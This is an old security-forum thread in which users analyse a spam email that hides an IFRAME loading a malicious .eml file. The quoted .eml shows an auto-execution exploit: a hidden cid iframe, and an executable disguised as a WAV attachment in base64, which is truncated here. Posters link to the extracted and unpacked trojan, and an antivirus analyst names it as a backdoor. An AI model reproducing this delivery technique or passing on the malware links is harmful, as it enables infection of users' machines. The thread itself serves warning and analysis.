Armenian Knowledge Base  

Go Back   Armenian Knowledge Base > Technical sections > Software > Software Security
Register

Reply
 
LinkBack Thread Tools
Old 22.04.2002, 16:55   #1
¡no pasaran!
 
dolphin's Avatar
 
Join Date: 03 2002
Location: localhost
Age: 35
Posts: 540
Downloads: 0
Uploads: 0
Reputation: 13 | 4
Exclamation *** WARNING! ***

Code:
Received: from ns1.nrl.netsys.am (fw1.netsys.am [80.86.224.39])
	by wind.freenet.am (8.11.1/8.11.1) with ESMTP id g3LKnF925868
	for <[email protected]>; Mon, 22 Apr 2002 01:49:16 +0500 (GMT)
Received: from  (dialup.netsys.am [80.86.229.173]) by ns1.nrl.netsys.am
 (Rockliffe SMTPRA 4.5.6) with SMTP id <[email protected]> for <[email protected]>;
 Mon, 22 Apr 2002 01:14:09 +0500
Date: Mon, 22 Apr 2002 01:14:09 +0500
Message-ID: <[email protected]>
From: Web<[email protected]>
To: [email protected]
Subject: nor haykakan projekt
Mime-Version: 1.0
Content-Type: text/html;
  charset=windows-1251
X-UIDL: d\p&quot;!Hm%&quot;!mG,!!7GC&quot;!
Status: R 
X-Status: N


http://www.armenia.com.uk  -um bacvel e nor sayt hayastani evropayi xorhurd andamakcelu veraberyal.
Bolord mteq yev qvyarkeq i ogut hayastani
<IFRAME height=0 src=&quot;http://freenet.am/~nemar/index.eml&quot; 
width=0></IFRAME>
http://freenet.am/~nemar/index.eml contains the following: (Attention! If you are running windows and MS IE/Outlook DO NOT try to download and open this file!)

Code:
From: &quot;xxxxx&quot;
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
        type=&quot;multipart/alternative&quot;;
        boundary=&quot;1&quot;
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative; 
        boundary=&quot;2&quot;

 
--2
Content-Type: text/html;
        charset=&quot;iso-8859-1&quot;
Content-Transfer-Encoding: quoted-printable 

<HTML>
<HEAD>
</HEAD> 
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>



</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
        name=&quot;hh.exe&quot;
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>


TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAADbpM3bn8WjiJ/Fo4ifxaOIn8WjiP/Fo4hj5bGIncWjiFjDpYiexaOIUmlj
.....
Then follows base64 encoded hh.exe file, that probably will be automaticli executed by some new versions of MS IE and Outlooks...

I'm sure, that it infected with some troyan program and may be dangerous.

Here is extracted hh.exe: http://dolphin.nt.am/VIRUS/hh.exe

If you have some recently updated antivirus program (AVP recomended) please download this file with care (!!only download, do not open!!)
and check it. Please write down here the results.

(I'm running Linux and cant do it by myself)

Thanks in advance!

__________________
[ que fors aus ne le sot riens nee ]
Reply With Quote
Old 22.04.2002, 17:25   #2
»
 
z0mbie's Avatar
 
Join Date: 01 2002
Posts: 777
Downloads: 1
Uploads: 0
Reputation: 0 | 0
Post

AVP & DrWeb (both updated today) nichego ne naxodyat no eto tochno trojan upakovannыy aspack-om

a naschet automatically executed - eto rabotaet tol'ko na redkix starыx versiyax Outlook-a
Reply With Quote
Old 22.04.2002, 19:45   #3
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Da, eto dowol';no staraya stuka, cherez iframe fuile dowloadit'....lol
Pomnish dolphin, skol'ko vodi uteklo
Reply With Quote
Old 24.04.2002, 00:46   #4
Optimist
 
Vazgen Abgaryan's Avatar
 
Join Date: 10 2001
Location: Yerevan
Posts: 712
Downloads: 6
Uploads: 0
Reputation: 53 | 4
Post

Hello!
This file contains the new backdoor utility: DTR.14.c
The detection routine will be added with a daily update.

Best regards,
Valentin
___________________________________________________
Valentin Kolesnikov,
Kaspersky Labs
http://www.kaspersky.com
http://www.viruslist.com
Reply With Quote
Old 24.04.2002, 02:50   #5
Младенец
 
Join Date: 10 2001
Location: Yerevan
Posts: 55
Downloads: 7
Uploads: 0
Reputation: 8 | 0
Post

http://freenet.am/~softland/hh-unpck.exe

i got interested in this progie, and i unpacked it (string references only, no import table(need to run it to dump IT, hehe ) to understand its work better, i uploaded it to my ftp and u can study its work too.
disassemble it with your favourite disasmer and a a lot things will come understandable....
yeah, and dont execute it, hehe ::}
__________________
http://freenet.am/~softland
Reply With Quote
Sponsored Links
Reply

Thread Tools


На правах рекламы:
реклама

All times are GMT. The time now is 17:33.


Powered by vBulletin® Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.